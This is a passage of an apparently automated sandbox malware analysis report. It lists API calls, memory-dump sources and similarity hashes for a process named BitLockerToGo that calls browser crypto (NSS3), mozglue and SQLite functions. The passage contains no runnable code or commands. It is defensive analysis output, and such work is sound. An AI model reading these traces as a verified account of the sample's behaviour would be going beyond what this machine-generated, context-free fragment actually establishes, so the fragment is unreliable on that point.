                                                                                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9D4448
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D484E
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D4863
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D4878
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C9D4896
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE ref: 6C9D489F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: floor$free$malloc$memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3842999660-3916222277
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05ec98801ab73339c9909d49784bba0e108b577147f6dfed8a9945bb9974c7d1
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a32a1fec539c48a66391695e9bf28a1f951960840ba79e9ad750ac68345943af
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ec98801ab73339c9909d49784bba0e108b577147f6dfed8a9945bb9974c7d1
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F24A74908B808FC761CF28C08469AFBF1BFD9348F158A5ED99997711DB31E896CB42
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBA8EC,0000006C), ref: 6CAB6DC6
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBA958,0000006C), ref: 6CAB6DDB
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBA9C4,00000078), ref: 6CAB6DF1
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBAA3C,0000006C), ref: 6CAB6E06
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,6CBBAAA8,00000060), ref: 6CAB6E1C
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB6E38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PK11_DoesMechanism.NSS3(?,?), ref: 6CAB6E76
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAB726F
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAB7283
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
• String ID: !
• API String ID: 3333340300-2657877971
• Opcode ID: be4fbda69924abbdefb57c41bb3067b9a18b35fbff3bdcb85a1cde692392293e
• Instruction ID: 87f982c79e9f0ab88fd6443db71cc57d09e14bd378f82829fe15ec69bae55e05
• Opcode Fuzzy Hash: be4fbda69924abbdefb57c41bb3067b9a18b35fbff3bdcb85a1cde692392293e
• Instruction Fuzzy Hash: 96728D75D052199FDB60DF28DC88B9ABBB5BF48304F1441A9E80DA7701EB71AAC4CF91
APIs
• GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C9864DF
• GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C9864F2
• GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C986505
• GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C986518
• GetModuleHandleW.KERNEL32(user32.dll), ref: 6C98652B
• memcpy.VCRUNTIME140(?,?,?), ref: 6C98671C
• GetCurrentProcess.KERNEL32 ref: 6C986724
• FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C98672F
• GetCurrentProcess.KERNEL32 ref: 6C986759
• FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C986764
• VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C986A80
• GetSystemInfo.KERNEL32(?), ref: 6C986ABE
• __Init_thread_footer.LIBCMT ref: 6C986AD3
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C986AE8
• free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C986AF7
Strings
Memory Dump Source
• Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
Similarity
• API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
• String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
• API String ID: 487479824-2878602165
• Opcode ID: 70b63c23692b3200ba74d0d182bee171e7945d0474fb349646532da8d483d02e
• Instruction ID: ab60888270dda105ff521e41951c31cf7b627af4a75afd2c426f7f8ff0d579ae
• Opcode Fuzzy Hash: 70b63c23692b3200ba74d0d182bee171e7945d0474fb349646532da8d483d02e
• Instruction Fuzzy Hash: C4F103709162199FCF20CF64DC88B9AB7B9AF45318F1446D9D819EB680D731EE84CF90
APIs
• PORT_ArenaMark_Util.NSS3(?), ref: 6CAFACC4
• PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6CAFACD5
• memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6CAFACF3
• SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6CAFAD3B
• SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CAFADC8
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFADDF
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFADF0
  • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAFB06A
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFB08C
• PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAFB1BA
• PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAFB27C
• memset.VCRUNTIME140(?,00000000,00002010), ref: 6CAFB2CA
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAFB3C1
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAFB40C
Memory Dump Source
• Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
Similarity
• API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
• String ID:
• API String ID: 1285963562-0
• Opcode ID: 4ba3be511d1eb61e8a947c37e6c1482639ffdcb3955814337868d2b17b27cbfe
• Instruction ID: 3fc462456e3e7315c193f81b64d46ce4f6efa31971ca629f1550dd4d21bcd03e
• Opcode Fuzzy Hash: 4ba3be511d1eb61e8a947c37e6c1482639ffdcb3955814337868d2b17b27cbfe
• Instruction Fuzzy Hash: A722A071904301AFE710CF14DD44B9A77F1AF84308F28862CF9695B791E772E89ACB96
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DC5F9
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DC6FB
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9DC74D
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C9DC7DE
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C9DC9D5
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DCC76
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9DCD7A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DDB40
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DDB62
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DDB99
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DDD8B
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C9DDE95
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DE360
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C9DE432
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C9DE472
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_initialize.NSS3 ref: 6CA7ED38
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA14FC4
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(snippet), ref: 6CA7EF3C
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(offsets), ref: 6CA7EFE4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CA15001,?,00000003,00000000), ref: 6CB3DFD7
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(matchinfo), ref: 6CA7F087
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(matchinfo), ref: 6CA7F129
                                                                                                                                                                                                                                                                                                                    • sqlite3_mprintf.NSS3(optimize), ref: 6CA7F1D1
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?), ref: 6CA7F368
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                                                                                                                    • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                                                                                    • API String ID: 2518200370-449611708
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C99EE7A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C99EFB5
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C9A1695
                                                                                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9A16B4
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C9A1770
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9A1A3E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA1ED0A
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA1EE68
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA1EF87
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CA1EF98
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • database corruption, xrefs: 6CA1F48D
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CA1F492
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA1F483
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                    • API String ID: 4101233201-598938438
                                                                                                                                                                                                                                                                                                                    • Opcode ID: faa27704279845fb437324faa9b73ee2efddbc9c5699c7686301d936fb352901
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 01a395191523c19a16a70c99783452429b59906f169996839c87e8a58edbc71b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faa27704279845fb437324faa9b73ee2efddbc9c5699c7686301d936fb352901
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3662E174A082858FDB04CF69C884B9ABBB1BF45328F1C419DD8565BF92D735E8C6CB90
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D4F2
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D50B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: EnterCriticalSection.KERNEL32(6C9FE784), ref: 6C97CFF6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: LeaveCriticalSection.KERNEL32(6C9FE784), ref: 6C97D026
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D52E
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE7DC), ref: 6C99D690
                                                                                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C99D6A6
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE7DC), ref: 6C99D712
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D751
                                                                                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C99D7EA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                                                    • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e409147fc92ae23b6c69196b78f85c8e0483bc2ab22532a4bdd9eac1aefa8d6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 37ad5fdb8974b1c8bcd2685082187e2c9ccaac3afb0062a5b2c1744377bc94b9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e409147fc92ae23b6c69196b78f85c8e0483bc2ab22532a4bdd9eac1aefa8d6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3291B572A087418FD714CF29C4D072AB7E5FB99718F28892ED56AC7B85D730E845CB82
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_PubDeriveWithKDF.NSS3 ref: 6CAC0F8D
                                                                                                                                                                                                                                                                                                                    • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAC0FB3
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CAC1006
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?), ref: 6CAC101C
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAC1033
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC103F
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(00000000), ref: 6CAC1048
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CAC108E
                                                                                                                                                                                                                                                                                                                    • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAC10BB
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,00000006,?), ref: 6CAC10D6
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CAC112E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CAC08C4,?,?), ref: 6CAC15B8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CAC08C4,?,?), ref: 6CAC15C1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC162E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC1637
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1510409361-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 78915ef522ec29d19d8e3fe71fc0461eddc40dab64e2551ed60e67c7562c2274
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 81e37c11e69b37abc4942c0a7dd9eca55136e22a247518f4d243eadbb6c7655d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78915ef522ec29d19d8e3fe71fc0461eddc40dab64e2551ed60e67c7562c2274
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1071C0B1B002458FDB04CFA5DD84A6AB7F0FF48318F18862DEA1997711E731D989CB92
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C3F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C60
                                                                                                                                                                                                                                                                                                                    • PR_ExplodeTime.NSS3(00000000,6CA91C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C94
                                                                                                                                                                                                                                                                                                                    Strings
